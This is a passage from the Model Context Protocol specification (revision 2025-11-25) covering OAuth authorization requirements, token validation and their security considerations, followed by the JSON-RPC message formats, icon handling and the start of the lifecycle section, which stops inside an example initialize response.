for basic functionality (see [Scope Minimization](/specification/2025-11-25/basic/security_best_practices#scope-minimization)),
with additional scopes requested incrementally through the step-up authorization flow steps
described in the [Scope Challenge Handling](#scope-challenge-handling) section.
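A minimal sketch of this priority order (the helper name is hypothetical):

```typescript theme={null}
// Choose the scope to request during the initial authorization handshake.
function selectScope(
  challengeScope: string | undefined,    // from the 401 WWW-Authenticate header
  scopesSupported: string[] | undefined, // from Protected Resource Metadata
): string | undefined {
  if (challengeScope) return challengeScope;             // 1. challenge is authoritative
  if (scopesSupported) return scopesSupported.join(" "); // 2. fall back to scopes_supported
  return undefined;                                      // otherwise omit the scope parameter
}
```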
## Authorization Flow Steps
The complete Authorization flow proceeds as follows:
```mermaid theme={null}
sequenceDiagram
participant B as User-Agent (Browser)
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
C->>M: MCP request without token
M->>C: HTTP 401 Unauthorized with WWW-Authenticate header
Note over C: Extract resource_metadata URL from WWW-Authenticate
C->>M: Request Protected Resource Metadata
M->>C: Return metadata
Note over C: Parse metadata and extract authorization server(s); client determines AS to use
C->>A: GET Authorization server metadata endpoint
Note over C,A: Try OAuth 2.0 and OpenID Connect discovery endpoints in priority order
A-->>C: Authorization server metadata
alt Client ID Metadata Documents
Note over C: Client uses HTTPS URL as client_id
Note over A: Server detects URL-formatted client_id
A->>C: Fetch metadata from client_id URL
C-->>A: JSON metadata document
Note over A: Validate metadata and redirect_uris
else Dynamic client registration
C->>A: POST /register
A->>C: Client Credentials
else Pre-registered client
Note over C: Use existing client_id
end
Note over C: Generate PKCE parameters; include resource parameter; apply scope selection strategy
C->>B: Open browser with authorization URL + code_challenge + resource
B->>A: Authorization request with resource parameter
Note over A: User authorizes
A->>B: Redirect to callback with authorization code
B->>C: Authorization code callback
C->>A: Token request + code_verifier + resource
A->>C: Access token (+ refresh token)
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Resource Parameter Implementation
MCP clients **MUST** implement Resource Indicators for OAuth 2.0 as defined in [RFC 8707](https://www.rfc-editor.org/rfc/rfc8707.html)
to explicitly specify the target resource for which the token is being requested. The `resource` parameter:
1. **MUST** be included in both authorization requests and token requests.
2. **MUST** identify the MCP server that the client intends to use the token with.
3. **MUST** use the canonical URI of the MCP server as defined in [RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#name-access-token-request).
### Canonical Server URI
For the purposes of this specification, the canonical URI of an MCP server is defined as the resource identifier as specified in
[RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#section-2) and aligns with the `resource` parameter in
[RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728).
MCP clients **SHOULD** provide the most specific URI that they can for the MCP server they intend to access, following the guidance in [RFC 8707](https://www.rfc-editor.org/rfc/rfc8707). While the canonical form uses lowercase scheme and host components, implementations **SHOULD** accept uppercase scheme and host components for robustness and interoperability.
Examples of valid canonical URIs:
* `https://mcp.example.com/mcp`
* `https://mcp.example.com`
* `https://mcp.example.com:8443`
* `https://mcp.example.com/server/mcp` (when path component is necessary to identify individual MCP server)
Examples of invalid canonical URIs:
* `mcp.example.com` (missing scheme)
* `https://mcp.example.com#fragment` (contains fragment)
> **Note:** While both `https://mcp.example.com/` (with trailing slash) and `https://mcp.example.com` (without trailing slash) are technically valid absolute URIs according to [RFC 3986](https://www.rfc-editor.org/rfc/rfc3986), implementations **SHOULD** consistently use the form without the trailing slash for better interoperability unless the trailing slash is semantically significant for the specific resource.
For example, if accessing an MCP server at `https://mcp.example.com`, the authorization request would include:
```
&resource=https%3A%2F%2Fmcp.example.com
```
MCP clients **MUST** send this parameter regardless of whether authorization servers support it.
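A sketch of producing the canonical resource value and encoding it (the function name is hypothetical):

```typescript theme={null}
// Normalize the MCP server URL into a canonical resource identifier:
// drop any fragment and prefer the form without a trailing slash.
function canonicalResource(serverUrl: string): string {
  const url = new URL(serverUrl);
  url.hash = "";
  let canonical = url.toString();
  if (url.pathname === "/" && !url.search) {
    canonical = canonical.replace(/\/$/, "");
  }
  return canonical;
}

const params = new URLSearchParams({
  resource: canonicalResource("https://mcp.example.com"),
});
// params.toString() → "resource=https%3A%2F%2Fmcp.example.com"
```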
## Access Token Usage
### Token Requirements
Access token handling when making requests to MCP servers **MUST** conform to the requirements defined in
[OAuth 2.1 Section 5 "Resource Requests"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5).
Specifically:
1. MCP client **MUST** use the Authorization request header field defined in
[OAuth 2.1 Section 5.1.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.1.1):
```
Authorization: Bearer <access-token>
```
Note that authorization **MUST** be included in every HTTP request from client to server,
even if they are part of the same logical session.
2. Access tokens **MUST NOT** be included in the URI query string
Example request:
```http theme={null}
GET /mcp HTTP/1.1
Host: mcp.example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
```
### Token Handling
MCP servers, acting in their role as an OAuth 2.1 resource server, **MUST** validate access tokens as described in
[OAuth 2.1 Section 5.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.2).
MCP servers **MUST** validate that access tokens were issued specifically for them as the intended audience,
according to [RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#section-2).
If validation fails, servers **MUST** respond according to
[OAuth 2.1 Section 5.3](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.3)
error handling requirements. Invalid or expired tokens **MUST** receive an HTTP 401
response.
MCP clients **MUST NOT** send tokens to the MCP server other than ones issued by the MCP server's authorization server.
MCP servers **MUST** only accept tokens that are valid for use with their
own resources.
MCP servers **MUST NOT** accept or transit any other tokens.
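As an illustration only, here is a minimal sketch of audience-bound validation for JWT access tokens, assuming the `jose` npm package and hypothetical issuer/JWKS URLs; servers issued opaque tokens would instead use token introspection:

```typescript theme={null}
import { createRemoteJWKSet, jwtVerify } from "jose";

// Hypothetical JWKS location published by the authorization server.
const jwks = createRemoteJWKSet(
  new URL("https://auth.example.com/.well-known/jwks.json"),
);

async function validateAccessToken(token: string) {
  // jwtVerify rejects bad signatures, expired tokens, wrong issuers, and
  // tokens whose audience is not this MCP server's canonical URI.
  const { payload } = await jwtVerify(token, jwks, {
    issuer: "https://auth.example.com",
    audience: "https://mcp.example.com",
  });
  return payload;
}
```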
## Error Handling
Servers **MUST** return appropriate HTTP status codes for authorization errors:
| Status Code | Description | Usage |
| ----------- | ------------ | ------------------------------------------ |
| 401 | Unauthorized | Authorization required or token invalid |
| 403 | Forbidden | Invalid scopes or insufficient permissions |
| 400 | Bad Request | Malformed authorization request |
### Scope Challenge Handling
This section covers handling insufficient scope errors during runtime operations when
a client already has a token but needs additional permissions. This follows the error
handling patterns defined in [OAuth 2.1 Section 5](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5)
and leverages the metadata fields from [RFC 9728 (OAuth 2.0 Protected Resource Metadata)](https://datatracker.ietf.org/doc/html/rfc9728).
#### Runtime Insufficient Scope Errors
When a client makes a request with an access token with insufficient
scope during runtime operations, the server **SHOULD** respond with:
* `HTTP 403 Forbidden` status code (per [RFC 6750 Section 3.1](https://datatracker.ietf.org/doc/html/rfc6750#section-3.1))
* `WWW-Authenticate` header with the `Bearer` scheme and additional parameters:
* `error="insufficient_scope"` - indicating the specific type of authorization failure
* `scope="required_scope1 required_scope2"` - specifying the minimum scopes needed for the operation
* `resource_metadata` - the URI of the Protected Resource Metadata document (for consistency with 401 responses)
* `error_description` (optional) - human-readable description of the error
**Server Scope Management**: When responding with insufficient scope errors, servers
**SHOULD** include the scopes needed to satisfy the current request in the `scope`
parameter.
Servers have flexibility in determining which scopes to include:
* **Minimum approach**: Include only the scopes required for the specific operation (plus any already-granted scopes the operation still depends on, so clients do not lose previously granted permissions)
* **Recommended approach**: Include both existing relevant scopes and newly required scopes to prevent clients from losing previously granted permissions
* **Extended approach**: Include existing scopes, newly required scopes, and related scopes that commonly work together
The choice depends on the server's assessment of user experience impact and authorization friction.
Servers **SHOULD** be consistent in their scope inclusion strategy to provide predictable behavior for clients.
Servers **SHOULD** consider the user experience impact when determining which scopes to include in the
response, as misconfigured scopes may require frequent user interaction.
Example insufficient scope response:
```http theme={null}
HTTP/1.1 403 Forbidden
WWW-Authenticate: Bearer error="insufficient_scope",
scope="files:read files:write user:profile",
resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource",
error_description="Additional file write permission required"
```
#### Step-Up Authorization Flow
Clients will receive scope-related errors during initial authorization or at runtime (`insufficient_scope`).
Clients **SHOULD** respond to these errors by requesting a new access token with an expanded scope set via a step-up authorization flow, or handle the errors in other appropriate ways.
Clients acting on behalf of a user **SHOULD** attempt the step-up authorization flow. Clients acting on their own behalf (`client_credentials` clients)
**MAY** attempt the step-up authorization flow or abort the request immediately.
The flow is as follows:
1. **Parse error information** from the authorization server response or `WWW-Authenticate` header
2. **Determine required scopes** as outlined in [Scope Selection Strategy](#scope-selection-strategy).
3. **Initiate (re-)authorization** with the determined scope set
4. **Retry the original request** with the new token; if the error persists after a small number of retries, treat it as a permanent authorization failure
Clients **SHOULD** implement retry limits and **SHOULD** track scope upgrade attempts to avoid
repeated failures for the same resource and operation combination.
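One possible shape for bounded step-up retries (all names here are hypothetical):

```typescript theme={null}
// Track upgrade attempts per resource + operation and give up after a limit.
const upgradeAttempts = new Map<string, number>();
const MAX_UPGRADES = 2;

async function withStepUp(
  key: string,
  request: () => Promise<Response>,
  reauthorize: (scope: string) => Promise<void>,
): Promise<Response> {
  let response = await request();
  while (response.status === 403) {
    const attempts = upgradeAttempts.get(key) ?? 0;
    if (attempts >= MAX_UPGRADES) {
      throw new Error("Permanent authorization failure");
    }
    upgradeAttempts.set(key, attempts + 1);
    const challenge = response.headers.get("WWW-Authenticate") ?? "";
    const scope = /scope="([^"]*)"/.exec(challenge)?.[1];
    if (!scope) throw new Error("No scope guidance in challenge");
    await reauthorize(scope); // step-up authorization with the challenged scopes
    response = await request();
  }
  return response;
}
```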
## Security Considerations
Implementations **MUST** follow OAuth 2.1 security best practices as laid out in [OAuth 2.1 Section 7. "Security Considerations"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#name-security-considerations).
### Token Audience Binding and Validation
[RFC 8707](https://www.rfc-editor.org/rfc/rfc8707.html) Resource Indicators provide critical security benefits by binding tokens to their intended
audiences **when the Authorization Server supports the capability**. To enable current and future adoption:
* MCP clients **MUST** include the `resource` parameter in authorization and token requests as specified in the [Resource Parameter Implementation](#resource-parameter-implementation) section
* MCP servers **MUST** validate that tokens presented to them were specifically issued for their use
The [Security Best Practices document](/specification/2025-11-25/basic/security_best_practices#token-passthrough)
outlines why token audience validation is crucial and why token passthrough is explicitly forbidden.
### Token Theft
Attackers who obtain tokens stored by the client, or tokens cached or logged on the server can access protected resources with
requests that appear legitimate to resource servers.
Clients and servers **MUST** implement secure token storage and follow OAuth best practices,
as outlined in [OAuth 2.1, Section 7.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.1).
Authorization servers **SHOULD** issue short-lived access tokens to reduce the impact of leaked tokens.
For public clients, authorization servers **MUST** rotate refresh tokens as described in [OAuth 2.1 Section 4.3.1 "Token Endpoint Extension"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-4.3.1).
### Communication Security
Implementations **MUST** follow [OAuth 2.1 Section 1.5 "Communication Security"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-1.5).
Specifically:
1. All authorization server endpoints **MUST** be served over HTTPS.
2. All redirect URIs **MUST** be either `localhost` or use HTTPS.
### Authorization Code Protection
An attacker who has gained access to an authorization code contained in an authorization response can try to redeem the authorization code for an access token or otherwise make use of the authorization code.
(Further described in [OAuth 2.1 Section 7.5](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.5))
To mitigate this, MCP clients **MUST** implement PKCE according to [OAuth 2.1 Section 7.5.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.5.2) and **MUST** verify PKCE support before proceeding with authorization.
PKCE helps prevent authorization code interception and injection attacks by requiring clients to create a secret verifier-challenge pair, ensuring that only the original requestor can exchange an authorization code for tokens.
MCP clients **MUST** use the `S256` code challenge method when technically capable, as required by [OAuth 2.1 Section 4.1.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-4.1.1).
Since OAuth 2.1 and PKCE specifications do not define a mechanism for clients to discover PKCE support, MCP clients **MUST** rely on authorization server metadata to verify this capability:
* **OAuth 2.0 Authorization Server Metadata**: If `code_challenge_methods_supported` is absent, the authorization server does not support PKCE and MCP clients **MUST** refuse to proceed.
* **OpenID Connect Discovery 1.0**: While the [OpenID Provider Metadata](https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderMetadata) does not define `code_challenge_methods_supported`, this field is commonly included by OpenID providers. MCP clients **MUST** verify the presence of `code_challenge_methods_supported` in the provider metadata response. If the field is absent, MCP clients **MUST** refuse to proceed.
Authorization servers providing OpenID Connect Discovery 1.0 **MUST** include `code_challenge_methods_supported` in their metadata to ensure MCP compatibility.
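A sketch of the required check (the type and helper names are hypothetical):

```typescript theme={null}
interface AuthorizationServerMetadata {
  code_challenge_methods_supported?: string[];
}

// Refuse to proceed unless the metadata advertises S256 PKCE support.
function assertPkceSupport(metadata: AuthorizationServerMetadata): void {
  const methods = metadata.code_challenge_methods_supported;
  if (!methods || !methods.includes("S256")) {
    throw new Error(
      "Authorization server metadata does not advertise S256 PKCE support; refusing to proceed",
    );
  }
}
```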
### Open Redirection
An attacker may craft malicious redirect URIs to direct users to phishing sites.
MCP clients **MUST** have redirect URIs registered with the authorization server.
Authorization servers **MUST** validate exact redirect URIs against pre-registered values to prevent redirection attacks.
MCP clients **SHOULD** use and verify state parameters in the authorization code flow
and discard any results that do not include or have a mismatch with the original state.
Authorization servers **MUST** take precautions to prevent redirecting user agents to untrusted URIs, following the suggestions laid out in [OAuth 2.1 Section 7.12.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.12.2).
Authorization servers **SHOULD** only automatically redirect the user agent if they trust the redirection URI. If the URI is not trusted, the authorization server **MAY** inform the user and rely on the user to make the correct decision.
### Client ID Metadata Document Security
When implementing Client ID Metadata Documents, authorization servers **MUST** consider the security implications
detailed in [OAuth Client ID Metadata Document, Section 6](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00#name-security-considerations).
Key considerations include:
#### Authorization Server Abuse Protection
The authorization server takes a URL as input from an unknown client and fetches that URL.
A malicious client could use this to trigger the authorization server to make requests to arbitrary URLs,
such as requests to private administration endpoints the authorization server has access to.
Authorization servers fetching metadata documents **SHOULD** consider
[Server-Side Request Forgery (SSRF)](https://developer.mozilla.org/docs/Web/Security/Attacks/SSRF) risks, as described in [OAuth Client ID Metadata Document: Server Side Request Forgery (SSRF) Attacks](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00#name-server-side-request-forgery).
#### Localhost Redirect URI Risks
Client ID Metadata Documents cannot prevent `localhost` URL impersonation by themselves. An attacker can claim to be any client by:
1. Providing the legitimate client's metadata URL as their `client_id`
2. Binding to any `localhost` port and providing that address as the `redirect_uri`
3. Receiving the authorization code via the redirect when the user approves
The server will see the legitimate client's metadata document and the user will see the legitimate client's name, making attack detection difficult.
Authorization servers:
* **SHOULD** display additional warnings for `localhost`-only redirect URIs
* **MAY** require additional attestation mechanisms for enhanced security
* **MUST** clearly display the redirect URI hostname during authorization
#### Trust Policies
Authorization servers **MAY** implement domain-based trust policies:
* Allowlists for trusted domains (for protected servers)
* Accept any HTTPS `client_id` (for open servers)
* Reputation checks for unknown domains
* Restrictions based on domain age or certificate validation
* Display the Client ID Metadata Document (CIMD) host and other associated client hostnames prominently to prevent phishing
Servers maintain full control over their access policies.
### Confused Deputy Problem
Attackers can exploit MCP servers acting as intermediaries to third-party APIs, leading to [confused deputy vulnerabilities](/specification/2025-11-25/basic/security_best_practices#confused-deputy-problem).
By using stolen authorization codes, they can obtain access tokens without user consent.
MCP proxy servers using static client IDs **MUST** obtain user consent for each dynamically
registered client before forwarding to third-party authorization servers (which may require additional consent).
### Access Token Privilege Restriction
An attacker can gain unauthorized access or otherwise compromise an MCP server if the server accepts tokens issued for other resources.
This vulnerability has two critical dimensions:
1. **Audience validation failures.** When an MCP server doesn't verify that tokens were specifically intended for it (for example, via the audience claim, as mentioned in [RFC9068](https://www.rfc-editor.org/rfc/rfc9068.html)), it may accept tokens originally issued for other services. This breaks a fundamental OAuth security boundary, allowing attackers to reuse legitimate tokens across different services than intended.
2. **Token passthrough.** If the MCP server not only accepts tokens with incorrect audiences but also forwards these unmodified tokens to downstream services, it can potentially cause the ["confused deputy" problem](#confused-deputy-problem), where the downstream API may incorrectly trust the token as if it came from the MCP server or assume the token was validated by the upstream API. See the [Token Passthrough section](/specification/2025-11-25/basic/security_best_practices#token-passthrough) of the Security Best Practices guide for additional details.
MCP servers **MUST** validate access tokens before processing the request, ensuring the access token is issued specifically for the MCP server, and take all necessary steps to ensure no data is returned to unauthorized parties.
An MCP server **MUST** follow the guidelines in [OAuth 2.1 - Section 5.2](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#section-5.2) to validate inbound tokens.
MCP servers **MUST** only accept tokens specifically intended for themselves and **MUST** reject tokens that do not include them in the audience claim or otherwise verify that they are the intended recipient of the token. See the [Security Best Practices Token Passthrough section](/specification/2025-11-25/basic/security_best_practices#token-passthrough) for details.
If the MCP server makes requests to upstream APIs, it may act as an OAuth client to them. The access token used at the upstream API is a separate token, issued by the upstream authorization server. The MCP server **MUST NOT** pass through the token it received from the MCP client.
MCP clients **MUST** implement and use the `resource` parameter as defined in [RFC 8707 - Resource Indicators for OAuth 2.0](https://www.rfc-editor.org/rfc/rfc8707.html)
to explicitly specify the target resource for which the token is being requested. This requirement aligns with the recommendation in
[RFC 9728 Section 7.4](https://datatracker.ietf.org/doc/html/rfc9728#section-7.4). This ensures that access tokens are bound to their intended resources and
cannot be misused across different services.
## MCP Authorization Extensions
There are several authorization extensions to the core protocol that define additional authorization mechanisms. These extensions are:
* **Optional** - Implementations can choose to adopt these extensions
* **Additive** - Extensions do not modify or break core protocol functionality; they add new capabilities while preserving core protocol behavior
* **Composable** - Extensions are modular and designed to work together without conflicts, allowing implementations to adopt multiple extensions simultaneously
* **Versioned independently** - Extensions follow the core MCP versioning cycle but may adopt independent versioning as needed
A list of supported extensions can be found in the [MCP Authorization Extensions](https://github.com/modelcontextprotocol/ext-auth) repository.
# Overview
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/index
**Protocol Revision**: 2025-11-25
The Model Context Protocol consists of several key components that work together:
* **Base Protocol**: Core JSON-RPC message types
* **Lifecycle Management**: Connection initialization, capability negotiation, and
session control
* **Authorization**: Authentication and authorization framework for HTTP-based transports
* **Server Features**: Resources, prompts, and tools exposed by servers
* **Client Features**: Sampling and root directory lists provided by clients
* **Utilities**: Cross-cutting concerns like logging and argument completion
All implementations **MUST** support the base protocol and lifecycle management
components. Other components **MAY** be implemented based on the specific needs of the
application.
These protocol layers establish clear separation of concerns while enabling rich
interactions between clients and servers. The modular design allows implementations to
support exactly the features they need.
## Messages
All messages between MCP clients and servers **MUST** follow the
[JSON-RPC 2.0](https://www.jsonrpc.org/specification) specification. The protocol defines
these types of messages:
### Requests
[Requests](/specification/2025-11-25/schema#jsonrpcrequest) are sent from the client to the server or vice versa, to initiate an operation.
```typescript theme={null}
{
jsonrpc: "2.0";
id: string | number;
method: string;
params?: {
[key: string]: unknown;
};
}
```
* Requests **MUST** include a string or integer ID.
* Unlike base JSON-RPC, the ID **MUST NOT** be `null`.
* The request ID **MUST NOT** have been previously used by the requestor within the same
session.
### Responses
Responses are sent in reply to requests, containing either the result or error of the operation.
#### Result Responses
[Result responses](/specification/2025-11-25/schema#jsonrpcresultresponse) are sent when the operation completes successfully.
```typescript theme={null}
{
jsonrpc: "2.0";
id: string | number;
result: {
[key: string]: unknown;
}
}
```
* Result responses **MUST** include the same ID as the request they correspond to.
* Result responses **MUST** include a `result` field.
* The `result` **MAY** follow any JSON object structure.
#### Error Responses
[Error responses](/specification/2025-11-25/schema#jsonrpcerrorresponse) are sent when the operation fails or encounters an error.
```typescript theme={null}
{
jsonrpc: "2.0";
id?: string | number;
error: {
code: number;
message: string;
data?: unknown;
}
}
```
* Error responses **MUST** include the same ID as the request they correspond to (except in error cases where the ID could not be read due to a malformed request).
* Error responses **MUST** include an `error` field with a `code` and `message`.
* Error codes **MUST** be integers.
### Notifications
[Notifications](/specification/2025-11-25/schema#jsonrpcnotification) are sent from the client to the server or vice versa, as a one-way message.
The receiver **MUST NOT** send a response.
```typescript theme={null}
{
jsonrpc: "2.0";
method: string;
params?: {
[key: string]: unknown;
};
}
```
* Notifications **MUST NOT** include an ID.
## Auth
MCP provides an [Authorization](/specification/2025-11-25/basic/authorization) framework for use with HTTP.
Implementations using an HTTP-based transport **SHOULD** conform to this specification,
whereas implementations using STDIO transport **SHOULD NOT** follow this specification,
and instead retrieve credentials from the environment.
Additionally, clients and servers **MAY** negotiate their own custom authentication and
authorization strategies.
For further discussions and contributions to the evolution of MCP's auth mechanisms, join
us in
[GitHub Discussions](https://github.com/modelcontextprotocol/specification/discussions)
to help shape the future of the protocol!
## Schema
The full specification of the protocol is defined as a
[TypeScript schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts).
This is the source of truth for all protocol messages and structures.
There is also a
[JSON Schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.json),
which is automatically generated from the TypeScript source of truth, for use with
various automated tooling.
## JSON Schema Usage
The Model Context Protocol uses JSON Schema for validation throughout the protocol. This section clarifies how JSON Schema should be used within MCP messages.
### Schema Dialect
MCP supports JSON Schema with the following rules:
1. **Default dialect**: When a schema does not include a `$schema` field, it defaults to [JSON Schema 2020-12](https://json-schema.org/draft/2020-12/schema)
2. **Explicit dialect**: Schemas MAY include a `$schema` field to specify a different dialect
3. **Supported dialects**: Implementations MUST support at least 2020-12 and SHOULD document which additional dialects they support
4. **Recommendation**: Implementors are RECOMMENDED to use JSON Schema 2020-12.
### Example Usage
#### Default dialect (2020-12):
```json theme={null}
{
"type": "object",
"properties": {
"name": { "type": "string" },
"age": { "type": "integer", "minimum": 0 }
},
"required": ["name"]
}
```
#### Explicit dialect (draft-07):
```json theme={null}
{
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"name": { "type": "string" },
"age": { "type": "integer", "minimum": 0 }
},
"required": ["name"]
}
```
### Implementation Requirements
* Clients and servers **MUST** support JSON Schema 2020-12 for schemas without an explicit `$schema` field
* Clients and servers **MUST** validate schemas according to their declared or default dialect. They **MUST** handle unsupported dialects gracefully by returning an appropriate error indicating the dialect is not supported.
* Clients and servers **SHOULD** document which schema dialects they support
### Schema Validation
* Schemas **MUST** be valid according to their declared or default dialect
## General fields
### `_meta`
The `_meta` property/parameter is reserved by MCP to allow clients and servers
to attach additional metadata to their interactions.
Certain key names are reserved by MCP for protocol-level metadata, as specified below;
implementations MUST NOT make assumptions about values at these keys.
Additionally, definitions in the [schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts)
may reserve particular names for purpose-specific metadata, as declared in those definitions.
**Key name format:** valid `_meta` key names have two segments: an optional **prefix**, and a **name**.
**Prefix:**
* If specified, MUST be a series of labels separated by dots (`.`), followed by a slash (`/`).
* Labels MUST start with a letter and end with a letter or digit; interior characters can be letters, digits, or hyphens (`-`).
* Implementations SHOULD use reverse DNS notation (e.g., `com.example/` rather than `example.com/`).
* Any prefix where the second label is `modelcontextprotocol` or `mcp` is **reserved** for MCP use.
* For example: `io.modelcontextprotocol/`, `dev.mcp/`, `org.modelcontextprotocol.api/`, and `com.mcp.tools/` are all reserved.
* However, `com.example.mcp/` is NOT reserved, as the second label is `example`.
**Name:**
* Unless empty, MUST begin and end with an alphanumeric character (`[a-z0-9A-Z]`).
* MAY contain hyphens (`-`), underscores (`_`), dots (`.`), and alphanumerics in between.
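For illustration, here is a hypothetical `_meta` object combining a prefixed key and an unprefixed key; both key names are invented for this example, and the prefix is not reserved because its second label is `example`:
```json theme={null}
{
  "_meta": {
    "com.example.agent/trace-id": "8f3a2b1c",
    "priority": "high"
  }
}
```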
### `icons`
The `icons` property provides a standardized way for servers to expose visual identifiers for their resources, tools, prompts, and implementations. Icons enhance user interfaces by providing visual context and improving the discoverability of available functionality.
Icons are represented as an array of `Icon` objects, where each icon includes:
* `src`: A URI pointing to the icon resource (required). This can be:
* An HTTP/HTTPS URL pointing to an image file
* A data URI with base64-encoded image data
* `mimeType`: Optional MIME type override, for use when the type reported by the icon's source is missing or generic
* `sizes`: Optional array of size specifications (e.g., `["48x48"]`, `["any"]` for scalable formats like SVG, or `["48x48", "96x96"]` for multiple sizes)
* `theme`: Optional theme preference (`light` or `dark`) for the icon background
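For example, a server might declare both a raster icon and a scalable icon (the URLs are placeholders):
```json theme={null}
{
  "icons": [
    {
      "src": "https://example.com/icon-48.png",
      "mimeType": "image/png",
      "sizes": ["48x48"],
      "theme": "light"
    },
    {
      "src": "https://example.com/icon.svg",
      "mimeType": "image/svg+xml",
      "sizes": ["any"]
    }
  ]
}
```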
**Required MIME type support:**
Clients that support rendering icons **MUST** support at least the following MIME types:
* `image/png` - PNG images (safe, universal compatibility)
* `image/jpeg` (and `image/jpg`) - JPEG images (safe, universal compatibility)
Clients that support rendering icons **SHOULD** also support:
* `image/svg+xml` - SVG images (scalable but requires security precautions as noted below)
* `image/webp` - WebP images (modern, efficient format)
**Security considerations:**
Consumers of icon metadata **MUST** take appropriate security precautions when handling icons to prevent compromise:
* Treat icon metadata and icon bytes as untrusted inputs and defend against network, privacy, and parsing risks.
* Ensure that the icon URI is either an HTTPS or `data:` URI. Clients **MUST** reject icon URIs that use unsafe schemes or redirects, such as `javascript:`, `file:`, `ftp:`, `ws:`, or local app URI schemes.
* Disallow scheme changes and redirects to hosts on different origins.
* Be resilient against resource exhaustion attacks stemming from oversized images, large dimensions, or excessive frames (e.g., in GIFs).
* Consumers **MAY** set limits for image and content size.
* Fetch icons without credentials. Do not send cookies, `Authorization` headers, or client credentials.
* Verify that icon URIs are from the same origin as the server. This minimizes the risk of exposing data or tracking information to third parties.
* Exercise caution when fetching and rendering icons as the payload **MAY** contain executable content (e.g., SVG with [embedded JavaScript](https://www.w3.org/TR/SVG11/script.html) or [extended capabilities](https://www.w3.org/TR/SVG11/extend.html)).
* Consumers **MAY** choose to disallow specific file types or otherwise sanitize icon files before rendering.
* Validate MIME types and file contents before rendering. Treat the MIME type information as advisory. Detect content type via magic bytes; reject on mismatch or unknown types.
* Maintain a strict allowlist of image types.
**Usage:**
Icons can be attached to:
* `Implementation`: Visual identifier for the MCP server/client implementation
* `Tool`: Visual representation of the tool's functionality
* `Prompt`: Icon to display alongside prompt templates
* `Resource`: Visual indicator for different resource types
Multiple icons can be provided to support different display contexts and resolutions. Clients should select the most appropriate icon based on their UI requirements.
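As a sketch, a tool definition carrying an icon might look like the following; the tool name, schema, and URL are invented for this example:
```json theme={null}
{
  "name": "get_weather",
  "title": "Weather Lookup",
  "description": "Get the current weather for a location",
  "inputSchema": {
    "type": "object",
    "properties": {
      "location": { "type": "string" }
    },
    "required": ["location"]
  },
  "icons": [
    {
      "src": "https://example.com/weather-icon.png",
      "mimeType": "image/png",
      "sizes": ["48x48"]
    }
  ]
}
```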
# Lifecycle
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/lifecycle
**Protocol Revision**: 2025-11-25
The Model Context Protocol (MCP) defines a rigorous lifecycle for client-server
connections that ensures proper capability negotiation and state management.
1. **Initialization**: Capability negotiation and protocol version agreement
2. **Operation**: Normal protocol communication
3. **Shutdown**: Graceful termination of the connection
```mermaid theme={null}
sequenceDiagram
participant Client
participant Server
Note over Client,Server: Initialization Phase
activate Client
Client->>+Server: initialize request
Server-->>Client: initialize response
Client--)Server: initialized notification
Note over Client,Server: Operation Phase
rect rgb(200, 220, 250)
note over Client,Server: Normal protocol operations
end
Note over Client,Server: Shutdown
Client--)-Server: Disconnect
deactivate Server
Note over Client,Server: Connection closed
```
## Lifecycle Phases
### Initialization
The initialization phase **MUST** be the first interaction between client and server.
During this phase, the client and server:
* Establish protocol version compatibility
* Exchange and negotiate capabilities
* Share implementation details
The client **MUST** initiate this phase by sending an `initialize` request containing:
* Protocol version supported
* Client capabilities
* Client implementation information
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-11-25",
"capabilities": {
"roots": {
"listChanged": true
},
"sampling": {},
"elicitation": {
"form": {},
"url": {}
},
"tasks": {
"requests": {
"elicitation": {
"create": {}
},
"sampling": {
"createMessage": {}
}
}
}
},
"clientInfo": {
"name": "ExampleClient",
"title": "Example Client Display Name",
"version": "1.0.0",
"description": "An example MCP client application",
"icons": [
{
"src": "https://example.com/icon.png",
"mimeType": "image/png",
"sizes": ["48x48"]
}
],
"websiteUrl": "https://example.com"
}
}
}
```
The server **MUST** respond with its own capabilities and information:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-11-25",
"capabilities": {
"logging": {},
"prompts": {
"listChanged": true
},
"resources": {
"subscribe": true,
"listChanged": true
},
"tools": {
"listChanged": true
},
"tasks": {
"list": {},
"cancel": {},
"requests": {
"tools": {
"call": {}
}
}
}
},
"serverInfo": {
"name": "ExampleServer",
"title": "Example Server Display Name",
"version": "1.0.0",
"description": "An example MCP server providing tools and resources",
